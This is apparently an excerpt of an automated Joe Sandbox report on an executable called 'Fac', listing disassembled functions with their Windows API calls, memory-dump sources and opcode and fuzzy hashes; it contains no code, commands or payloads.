SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040501A
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040502F
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405053
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405073
ImageList_Destroy.COMCTL32(?), ref: 00405088
GlobalFree.KERNEL32(?), ref: 00405098
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405111
SendMessageW.USER32(?,00001102,?,?), ref: 004051BA
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C9
InvalidateRect.USER32(?,00000000,00000001), ref: 004051E9
ShowWindow.USER32(?,00000000), ref: 00405237
GetDlgItem.USER32(?,000003FE), ref: 00405242
ShowWindow.USER32(00000000), ref: 00405249

Strings

N, xrefs: 00404EF3
, xrefs: 00405221
M, xrefs: 00404E12

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: d0ab387dba1094753cc2861ad9fb0d9ca09aa5e33736c44ba4ea0e36dbbc038f
Instruction ID: eb67e1f84f539b9e971c37d3801f2636e85636a2c3494a43e8d053fef61581d0
Opcode Fuzzy Hash: d0ab387dba1094753cc2861ad9fb0d9ca09aa5e33736c44ba4ea0e36dbbc038f
Instruction Fuzzy Hash: E6027EB0A00209EFDB209F55CD45AAE7BB9FB44314F10857AF610BA2E1C7799E52CF58

Function 00405996 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,00437800,77293420,00000000), ref: 004059BF
lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,00437800,77293420,00000000), ref: 00405A07
lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,00437800,77293420,00000000), ref: 00405A2A
lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,00437800,77293420,00000000), ref: 00405A30
FindFirstFileW.KERNEL32(004256F0,?,?,?,0040A014,?,004256F0,?,?,00437800,77293420,00000000), ref: 00405A40
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AE0
FindClose.KERNEL32(00000000), ref: 00405AEF

Strings

\*.*, xrefs: 00405A01

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 2035342205-1173974218
Opcode ID: d3b1db4ec6e858d6de83fe0182b98463dfe8c84cfbcf579265b0cac0546164ac
Instruction ID: c51eb27d53b6fe35fd8e31d26e19e594c53701a60ebafcf50548af423f91ca56
Opcode Fuzzy Hash: d3b1db4ec6e858d6de83fe0182b98463dfe8c84cfbcf579265b0cac0546164ac
Instruction Fuzzy Hash: 0641B530A00914AACB21BB658C89BAF7778EF45729F60427FF801711D1D7BC5981DEAE

Function 0040698E Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
Instruction ID: 13591abb153405db8c483c3749d8f5c5d6ef56c483b3dbf0ce0e93ae11c78ade
Opcode Fuzzy Hash: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
Instruction Fuzzy Hash: 58F17871D04269CBDF18CFA8C8946ADBBB0FF44305F25856ED456BB281D3386A8ACF45

Function 004065C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00437800,00426738,00425EF0,00405CAA,00425EF0,00425EF0,00000000,00425EF0,00425EF0,00437800,?,77293420,004059B6,?,00437800,77293420), ref: 004065D2
FindClose.KERNEL32(00000000), ref: 004065DE

Strings

8gB, xrefs: 004065C8

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: 8gB
API String ID: 2295610775-1733800166
Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
Instruction ID: 17231fcebe31093dbb05a9ce9100934524038fc54cbd693a8662f86860803725
Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
Instruction Fuzzy Hash: 46D012315450206BC60517387D0C84BBA589F653357128A37F466F51E4C734CC628698

Function 37000508 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480841803.0000000037000000.00000040.00000800.00020000.00000000.sdmp, Offset: 37000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37000000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8d7ec748f0a32c7aea25aec4426c62de7d4b7df887d9a1f447238cab4a5d876
Instruction ID: fa0e6c8a17faa7ae6b3bb8e6cd7228180680d5da696983f5d8a5bc6c9756a483
Opcode Fuzzy Hash: c8d7ec748f0a32c7aea25aec4426c62de7d4b7df887d9a1f447238cab4a5d876
Instruction Fuzzy Hash: 34D1A174E013188FEB64DFA5C950B9DBBB2BF89300F6081A9D408AB354DB359E85CF51

Function 37000040 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480841803.0000000037000000.00000040.00000800.00020000.00000000.sdmp, Offset: 37000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37000000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbb6991503f7eaa17bc8f94f591650f3478d67421654764fc29f6c1d10681008
Instruction ID: 90dee372cfdc90b08bb505ade6bbe2794ba2c51b1d5f6af30f15387d0c297397
Opcode Fuzzy Hash: bbb6991503f7eaa17bc8f94f591650f3478d67421654764fc29f6c1d10681008
Instruction Fuzzy Hash: 8AD1A074E013188FEB64DFA5C950B9DBBB2BF89304F2081A9D408AB354DB359E82CF55

Function 37001360 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480841803.0000000037000000.00000040.00000800.00020000.00000000.sdmp, Offset: 37000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37000000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f662516a8e306b75db84890b5a627abc3f63336ea794452e1024f1dd07a66ea
Instruction ID: 294274aa978b333e7de68c08d6108e89c1a9f8935676422e9217795af19a5734
Opcode Fuzzy Hash: 0f662516a8e306b75db84890b5a627abc3f63336ea794452e1024f1dd07a66ea
Instruction Fuzzy Hash: 31D1A174E013188FDB64DFA5C854B9DBBB2BF89300F6081A9D409AB354DB359E86CF51

Function 37000E98 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480841803.0000000037000000.00000040.00000800.00020000.00000000.sdmp, Offset: 37000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37000000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be9b38a37002682de45c52e76ace7195e1af2f535ca3c827bcdc6572be331ee1
Instruction ID: 32e10ef5a35c21ff3bc3f3d8bbbb42c45ce4642cc9fd6f39b423d86861fff970
Opcode Fuzzy Hash: be9b38a37002682de45c52e76ace7195e1af2f535ca3c827bcdc6572be331ee1
Instruction Fuzzy Hash: CBD1A174E013188FDB64DFA5C950B9DBBB2BF89300F6081A9D408AB354DB359E86CF55

Function 370009D0 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480841803.0000000037000000.00000040.00000800.00020000.00000000.sdmp, Offset: 37000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37000000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45856b6056bb07c6ce122fc71802f6d9e1e90147a06cbdaa656e041c975671ca
Instruction ID: 9384d473b2a0b64c73d46b3fc8c5b014714eeba5c05698053159bf0e7241ef3a
Opcode Fuzzy Hash: 45856b6056bb07c6ce122fc71802f6d9e1e90147a06cbdaa656e041c975671ca
Instruction Fuzzy Hash: C8D1A174E013188FDB64DFA5C950B9DBBB2BF89304F2081A9D408AB354DB359E85CF51

Function 36FEB7F8 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480729407.0000000036FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fe0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 048ac1247573eb17028e88b9f500ac835651157e2bb65174d401c4a420dfe98c
Instruction ID: 9ace07a05bf8101514e76c1e559615a1bef1c17b172d816468804abefe442eb7
Opcode Fuzzy Hash: 048ac1247573eb17028e88b9f500ac835651157e2bb65174d401c4a420dfe98c
Instruction Fuzzy Hash: 2CD1A074E013188FDB64DFA5C990B9DBBB2BF89304F2081A9D408AB354DB359E86CF51

Function 36FE8CF0 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480729407.0000000036FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fe0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2498a12384118aaf7be61168da95c29788d76413023f89be45dd9304d1a8eed
Instruction ID: 781a33a4ffbf0fe047f754d747f804d998afb5ab7d7bc3d4e63398610a88add1
Opcode Fuzzy Hash: e2498a12384118aaf7be61168da95c29788d76413023f89be45dd9304d1a8eed
Instruction Fuzzy Hash: 88D1A074E013188FDB64DFA5C854B9DBBB2BF89304F6081A9D408AB394DB359E82CF55

Function 36FEFAE8 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480729407.0000000036FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fe0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cd0eeccaf20baf4b0830b350d0baec8032e7519eb8269639be61e32064ffb8f
Instruction ID: 2eccd0a6f269e378f4852c69bf0114f09936fa7bc03f2569a536942dd55ed164
Opcode Fuzzy Hash: 5cd0eeccaf20baf4b0830b350d0baec8032e7519eb8269639be61e32064ffb8f
Instruction Fuzzy Hash: 8CD1A074E013188FDB64DFA5C850B9DBBB2BF89304F6081A9D408AB354DB359E86CF51

Function 36FECFE0 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480729407.0000000036FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fe0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a2b10c82b6760aea7cd208fc77230df31dff1b7f7aa0f6134c12ed7a72420aa
Instruction ID: 016f9f3505518023b55c1eb25e43ed0bf921f085cad8ad768e74b0c342654c0f
Opcode Fuzzy Hash: 9a2b10c82b6760aea7cd208fc77230df31dff1b7f7aa0f6134c12ed7a72420aa
Instruction Fuzzy Hash: 42D19074E013188FDB64DFA5C850B9DBBB2BF89304F6081A9D408AB354DB359E86CF55

Function 36FEA4D8 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480729407.0000000036FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fe0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3e4e0d5fcb78bb0bee5621dfdb72316dfd06e30f5d79de038e1cdb750c2401d
Instruction ID: 210940b920e92ad2a6ef5dbf2a915f29584d9449db4e0de684ef53b023fb3bc5
Opcode Fuzzy Hash: d3e4e0d5fcb78bb0bee5621dfdb72316dfd06e30f5d79de038e1cdb750c2401d
Instruction Fuzzy Hash: 11D1A074E013188FDB64DFA5C890B9DBBB2BF89304F6081A9D409AB354DB359E86CF51

Function 36FE79D0 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480729407.0000000036FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fe0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d343a31e2b08f9b5488f9794fc6bf018a981759c011b14929f9a066b8e4f9732
Instruction ID: cf49ccc6df1697931f5c4d90adb49f26aa7a0343221049156d5128c2a5d17142
Opcode Fuzzy Hash: d343a31e2b08f9b5488f9794fc6bf018a981759c011b14929f9a066b8e4f9732
Instruction Fuzzy Hash: 01D1A174E013188FDB64DFA5C894B9DBBB2BF89304F6081A9D408AB354DB359E86CF51

Function 36FEE7C8 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480729407.0000000036FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fe0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b267a97c6aad27eabe50d796d264c3014282803c2d48ca724a2276024fc090bb
Instruction ID: 6d814f1d3816b52619517e3fa49030e530aedecb1b0ff1f2021b34d8b5f21afd
Opcode Fuzzy Hash: b267a97c6aad27eabe50d796d264c3014282803c2d48ca724a2276024fc090bb
Instruction Fuzzy Hash: 81D19074E013188FDB64DFA5C890B9DBBB2BF89304F6081A9D408AB354DB359E86CF55

Function 36FEBCC0 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480729407.0000000036FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fe0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28beccabddc335d76afe19bb006a159662fd7c3ae4cd6b7022299a8083774394
Instruction ID: 076c477e2a11b6115a971044c836b9ed8f13db4725d580db37ad11cb02d9fdfa
Opcode Fuzzy Hash: 28beccabddc335d76afe19bb006a159662fd7c3ae4cd6b7022299a8083774394
Instruction Fuzzy Hash: 97D1A078E013188FDB64DFA5C950B9DBBB2BF89304F6081A9D408AB354DB359E82CF51

Function 36FE91B8 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480729407.0000000036FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fe0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a01ddc77a41618d1290cd13b63d996ef182786d577736a43933d22a6d1643992
Instruction ID: 0f871d2b56c1593d78ded4319285f20531eff4b3dc052ba20f15f4879a9f0d2c
Opcode Fuzzy Hash: a01ddc77a41618d1290cd13b63d996ef182786d577736a43933d22a6d1643992
Instruction Fuzzy Hash: 88D19074E013188FDB64DFA5C850B9DBBB2BF89304F6081AAD408AB354DB359E86CF55

Function 36FE66B0 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480729407.0000000036FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fe0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c090753c5550f471f5c3909e04b4c750d9a0d5b3040a2b700eecb1c84e9445c
Instruction ID: c20cace05a18188ff0a979c790297b8d8d0f44fc4afb6bfcebe505ecdfaf79a8
Opcode Fuzzy Hash: 6c090753c5550f471f5c3909e04b4c750d9a0d5b3040a2b700eecb1c84e9445c
Instruction Fuzzy Hash: 44D1A074E013188FDB64DFA5C990B9DBBB2BF89304F6081A9D408AB354DB359E86CF51

Function 36FED4A8 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480729407.0000000036FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fe0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 730394b76f141f82e9e0f289504b8c6730c342c1dbb26f47f7b397d90c5b9919
Instruction ID: 0a2ac304bfbd338f4559eea4dc1fc442a43df340aa3e72ba32776eda0a3c1833
Opcode Fuzzy Hash: 730394b76f141f82e9e0f289504b8c6730c342c1dbb26f47f7b397d90c5b9919
Instruction Fuzzy Hash: 8FD19F74E013188FDB64DFA5C890B9DBBB2BF89304F6081A9D408AB354DB359E86CF55

Function 36FEA9A0 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480729407.0000000036FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fe0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbff138f2be2a97b0a81330e33d10b1e9ac77c08457db1de80c0cfc5cdbda120
Instruction ID: faf02dd2e6cc7d08bcf5b22885c3c6d67c17a494e9f0c9d68aa58fadc8a2358c
Opcode Fuzzy Hash: cbff138f2be2a97b0a81330e33d10b1e9ac77c08457db1de80c0cfc5cdbda120
Instruction Fuzzy Hash: 30D19074E013188FDB64DFA5C990B9DBBB2BF89304F6081A9D408AB354DB359E86CF51

Function 36FE7E98 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480729407.0000000036FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fe0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5f6681f30682620d6a17d080c492cbdecc550a2a3cbb8522a7765ee282324a7
Instruction ID: 1205e99f4eebb88e3c6ed015d0a489b7ef64e2fb84d6dffca9c89347fc026943
Opcode Fuzzy Hash: e5f6681f30682620d6a17d080c492cbdecc550a2a3cbb8522a7765ee282324a7
Instruction Fuzzy Hash: F7D1A074E013188FDB64DFA5C850B9DBBB2BF89300F2081A9D418AB354DB359E86CF55

Function 36FEEC90 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480729407.0000000036FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fe0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4259abb8590135a59857d87528e67860575f65b34352e995e8b8c854f70b8300
Instruction ID: 84267aee0aeca3a61dfdd6982d426d1013ea79dfee12c718a379412cf871bd49
Opcode Fuzzy Hash: 4259abb8590135a59857d87528e67860575f65b34352e995e8b8c854f70b8300
Instruction Fuzzy Hash: ECD19174E013188FDB64DFA5C850B9DBBB2BF89304F6081A9D408AB354DB359E86CF55

Function 36FEC188 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480729407.0000000036FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fe0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fbbf269ec7904115f0fff9060588f0bd6e0224e9658232cebdd53bb4c3ef171
Instruction ID: 0fcad19b56fa032bd675c51d4ebab5f37754758e0f88177002d9c7af360f6862
Opcode Fuzzy Hash: 3fbbf269ec7904115f0fff9060588f0bd6e0224e9658232cebdd53bb4c3ef171
Instruction Fuzzy Hash: 91D1A074E013188FDB64DFA5C850B9DBBB2BF89304F2081A9D418AB354DB359E86CF51

Function 36FE9680 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480729407.0000000036FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fe0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77db7439d861c5c5fe701e1722fbb914c21bbcd6c9ad63ef95d4dae568c212b7
Instruction ID: 986f89d4c1c2119b28870f46ee2c3e2a87e459d103081845da015068a4d17392
Opcode Fuzzy Hash: 77db7439d861c5c5fe701e1722fbb914c21bbcd6c9ad63ef95d4dae568c212b7
Instruction Fuzzy Hash: 5CD19F74E013188FDB64DFA5C990B9DBBB2BF89304F6081A9D408AB354DB359E86CF51

Function 36FE6B78 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480729407.0000000036FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fe0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4934c2b4b0edaf8fa3c3126f0293ed919df9da4c2837dc979b54a29fdc7f8c9
Instruction ID: cab87a1267668c827abb144171b5173fe2607ffdd3b481249d2f39677c1ed101
Opcode Fuzzy Hash: d4934c2b4b0edaf8fa3c3126f0293ed919df9da4c2837dc979b54a29fdc7f8c9
Instruction Fuzzy Hash: CCD19074E013188FDB64DFA5C850B9DBBB2BF89304F6081A9D408AB354DB359E86CF55

Function 36FED970 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480729407.0000000036FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fe0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34baf6ce987e12184f228cb00bfde787a7881b1a199efcc2c9d2b35a5bae5024
Instruction ID: a8b3fe54d9b759f210612396212c53da97c3a2f5c26e3d71efcc2bfb629785ac
Opcode Fuzzy Hash: 34baf6ce987e12184f228cb00bfde787a7881b1a199efcc2c9d2b35a5bae5024
Instruction Fuzzy Hash: 4FD1A178E013188FDB64DFA5C850B9DBBB2BF89304F6081A9D408AB354DB359E86CF51

Function 36FEAE68 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480729407.0000000036FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fe0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d887bfd46c14c8e1ad9236ae4c66f5607e1ea6cf69a64774ef171d7e6f15f49
Instruction ID: c19141a727704627edf7426bbb8ebe2947050b25331b4f08d87c9be2440a889d
Opcode Fuzzy Hash: 2d887bfd46c14c8e1ad9236ae4c66f5607e1ea6cf69a64774ef171d7e6f15f49
Instruction Fuzzy Hash: 4AD19F74E013188FDB64DFA5C994B9DBBB2BF89300F6081A9D408AB354DB359E86CF51

Function 36FE8360 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480729407.0000000036FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fe0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 471c879fe3bf4c93469fc01db3f3c4e0f5da3ff3a79896770b375c0aa4ad8d1e
Instruction ID: 7b76f5531cefcf5eedcebc58bdd1c6ac7d78ffe6af9089231eba20b4473f14e7
Opcode Fuzzy Hash: 471c879fe3bf4c93469fc01db3f3c4e0f5da3ff3a79896770b375c0aa4ad8d1e
Instruction Fuzzy Hash: 0AD1A074E013188FDB64DFA5C850B9DBBB2BF89300F6081A9D418AB354DB359E82CF55

Function 36FBBFF8 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ece02b282ab1dd5f37e15b03ba79cf6e91b8c10d0386849ed15c995d874e3e8
Instruction ID: d139da972b733d673c293070f4484fead06578abf9be4d92fd11714ab2b9c04d
Opcode Fuzzy Hash: 2ece02b282ab1dd5f37e15b03ba79cf6e91b8c10d0386849ed15c995d874e3e8
Instruction Fuzzy Hash: 35D19F78E012188FDB54DFA5C950B9DBBB2FF89300F2081A9D448AB365DB355E82CF55

Function 36FBDFE8 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b5b5f99cf35c2e561f207e754b7b044734a2a047fd4d35f66d84879d647dbb0
Instruction ID: 149635f99fd2ee64c4c0dac0cb037d788152941185d6b6bb818a1e2bf2e6781b
Opcode Fuzzy Hash: 0b5b5f99cf35c2e561f207e754b7b044734a2a047fd4d35f66d84879d647dbb0
Instruction Fuzzy Hash: 01D1AE78E002188FEB54DFA5C990B9DBBB2FF89304F2081A9D448AB365DB355D82CF55

Function 36FBB6D8 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 807958e6e0b200995065a830d5d76c85f542ca8c69dad048adaea144d508de92
Instruction ID: ecb551f6acc00dc8cab6c975311e433a76d1c10765e973a11c8d037e9675a514
Opcode Fuzzy Hash: 807958e6e0b200995065a830d5d76c85f542ca8c69dad048adaea144d508de92
Instruction Fuzzy Hash: 40D18F78E012188FDB54DFA5C990B9DBBB2FF89300F2081A9D448AB365DB359D82CF55

Function 36FBD6C8 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2669be490009ae8d5f886d33aad70570efb46ec62ece21626d8b8e9df10c5ae7
